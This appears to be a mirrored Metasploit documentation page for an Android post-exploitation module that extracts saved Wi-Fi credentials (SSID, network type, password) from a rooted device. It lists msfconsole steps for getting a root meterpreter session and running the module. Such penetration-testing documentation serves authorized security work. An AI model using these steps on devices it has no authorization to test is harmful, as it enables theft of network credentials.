Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/post/android/gather/wireless_ap.md
Views: 11705
Vulnerable Application
This post-exploitation module will extract all saved Wireless access point credentials from the target android device.
Verification Steps
Start
msfconsole
Get a root meterpreter session (use exploit/android/local/...)
use post/android/gather/wireless_ap
set SESSION <session id>
run
You should be able to see the extracted credentials.
Options
SESSION - The session to run the module on.
Extracted data
Wireless AP credentials (SSID, network type and password)